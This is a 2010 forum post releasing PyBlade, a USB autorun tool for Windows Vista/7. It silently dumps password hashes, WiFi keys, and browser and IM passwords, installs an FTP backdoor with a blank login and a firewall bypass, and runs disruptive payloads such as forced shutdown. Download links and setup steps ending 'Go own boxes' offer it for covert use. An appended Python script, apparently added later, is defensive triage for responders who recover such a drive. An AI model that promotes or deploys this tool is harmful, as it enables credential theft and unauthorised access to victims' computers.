About:
Some people have been asking for an updated switchblade to run on Vista/7 computers, so I thought I'd throw something together. It's a work in progress. I'm also fairly new to Python, so no making fun of my code.
Current Abilities:
-Gathers system info, running processes, and local IP settings
-Dumps SAM file, via pwdump
-Dumps saved WiFi keys
-Dumps IM passwords
-Dumps IE saved passwords
-Dumps IE history
-Dumps Firefox passwords
-Dumps Chrome passwords
-Easy to configure via conf file
-Auto prompts for UAC if enabled
-Works on 64-bit machines
-Completely hidden (other than UAC prompt)
-Keyboard Randomizer payload
-Landmine payload
-Emo Computer payload
-Rick Roll payload
-IE Homepage payload
-Save logs in .txt, .html, or .xml format
-U3 support via .u3p file
-Support for file slurping
-FTP backdoor installer (w/ XP Firewall bypass)
Planned Updates:
-Netcat backdoor installer
-AV Bypass / Evade
-Save all logs in .html / .xml format
Downloads:
PyBlade v0.3 ==> md5: a9b10c99eb2f2ecbabefb0f908a1e3bf
PyBlade Source Code v0.3 (Includes payloads' source code)
U3 Support (.u3p) *BETA*
v0.1
-Gathers system info, running processes, and network connections
-Dumps SAM file, via pwdump
-Dumps saved WiFi keys
-Dumps IM passwords
-Dumps IE saved passwords
-Dumps IE history
-Dumps Firefox passwords
-Dumps Chrome passwords
-Easy to configure via conf file
-Auto prompts for UAC if enabled
-Works on 64-bit machines
-Completely hidden (other than UAC prompt)
v0.2
-Added Keyboard Randomizer payload
-Added Landmine payload
-Added Change IE homepage payload
-Added comments to code
-Changed sysinfo to collect local IP settings
-Added options to save logs as .txt, .html, or .xml
-Added U3 support
-Checks to see if Firefox is installed before dumping passwords
v0.3
-Added Emo Computer payload (harmless, don't worry)
-Added Random Rick Roll payload
-Added support for file slurping
-Added icons for .exe's
-Added FTP Server backdoor
-Correctly sets file extensions when saving logs in .html/.xml
-Added ability to bypass XP Firewall, and hide exceptions from the GUI
-Added time stamps to log directories
Setup for Non-U3 Drives:
0. Obtain a USB drive, and put on a Glitch Mob album
1. Download latest version of PyBlade
2. Extract then copy the contents of PyBlade.rar to the root of your USB drive
3. Edit blade.conf to do your bidding (see below)
4. Go own boxes
Setup for Unmodified U3 Drives:
0. Obtain a U3 USB drive, and put on a Glitch Mob album
1. Download latest version of PyBlade
2. Extract then copy the contents of PyBlade.rar to the root of the flash partition on the U3 drive
3. Edit blade.conf to do your bidding (see below)
4. Download F_Bex.u3p (see above)
5. Open the U3 menu, click "Add Programs" and "Install from My Computer"
6. Select F_Bex.u3p, and set it to automatically run when the drive is inserted
7. Go own boxes
Configure Your Blade:
1. Open "blade.conf" in your favorite text editor (or notepad)
2. Enable/Disable programs by changing their execute value (Enable = 1)
Here are the default settings for v0.3:
# SwitchBlade Configuration File
# --------------------------------
# Log File Type
# Possible values; text, html, xml
log=html
# System Dumps
sysinfo=1
pwdump=1
wifi=1
mspass=1
iepw=1
iehist=1
ffpw=1
chromepw=1
# Payloads
keyrand=0
landmine=0
rickroll=0
emo=0
# Change IE Homepage
iehome=0
iehome_url=http://google.com
# Backdoors
ftpme=0
# File Slurping
# Seperate multiple directories using;'s
slurp=0
slurp_dirs=C:\Files;C:\Files2
Note that lines starting with '#' are comments and are ignored during execution. Do NOT comment out lines to disable programs; just set their execute value to 0.
3. Some lines contain strings:
logs= Change this to set how the log files are saved (.log, .html, .xml)
iehome_url= If the IE Homepage payload is enabled (iehome=1), this is the URL that the homepage will be set to.
slurp_dirs= This is a list of the directories you want copied onto your drive, you can list multiple directories by separating them with semicolons
4. To manually execute, run "bex.exe"
Payloads:
Keyboard Randomizer: This program randomizes all keyboard input while it's running (keyrand).
Landmine: Selects a key at random and forcefully turns off the computer when it's pressed (landmine).
Emo Computer: The computer becomes sad and pretends to delete all the files on the computer (emo).
FTPme: Installs an FTP server on the root of the C: drive with a blank username/password (ftpme).
Random Rick Roller: Will open up rick rolls at random time intervals (rickroll).
Note: All payloads are activated on reboot (except for FTPme).
Edited by sablefoxx, 23 August 2010 - 12:19 PM.
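For responders who recover a drive like this, the blade.conf format described in the post shows which modules were enabled, and so what to check on any host the drive was plugged into. The following is an added example, not part of the original post or of PyBlade's code; the function names and the sample config are constructed, while the keys, section names and payload behaviour come from the post.

```python
# Added triage example, not PyBlade code. Keys, section names and payload
# behaviour are taken from the post; the sample config below is constructed.
CHECKS = {
    **dict.fromkeys("sysinfo pwdump wifi mspass iepw iehist ffpw chromepw".split(),
                    "system dump: treat this data as exposed"),
    **dict.fromkeys("keyrand landmine rickroll emo".split(),
                    "payload: activated on reboot"),
    "iehome": "payload: IE homepage set",
    "ftpme": "backdoor: FTP server on C: root, blank username/password",
    "slurp": "file slurping: directories copied to the drive",
}

def parse_conf(text):
    """Return {key: value}; blank lines and '#' comment lines are skipped."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip().lower()] = value.strip()
    return conf

def triage(text):
    """List what a host that ran this configuration should be checked for."""
    conf = parse_conf(text)
    findings = []
    for key, what in CHECKS.items():
        if conf.get(key) != "1":  # the post: Enable = 1
            continue
        if key == "iehome":
            what += " to " + conf.get("iehome_url", "<not set>")
        elif key == "slurp":
            dirs = [d for d in conf.get("slurp_dirs", "").split(";") if d]
            what += ": " + ", ".join(dirs)
        findings.append(f"{key}: {what}")
    return findings

# Constructed sample: a subset of the post's defaults with ftpme/slurp enabled.
SAMPLE = r"""# SwitchBlade Configuration File
log=html
sysinfo=1
pwdump=0
#wifi=1
iehome=1
iehome_url=http://google.com
ftpme=1
slurp=1
slurp_dirs=C:\Files;C:\Files2
"""
```

Calling `triage(SAMPLE)` returns one finding per enabled key; the commented-out `wifi` line and `pwdump=0` produce none.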




















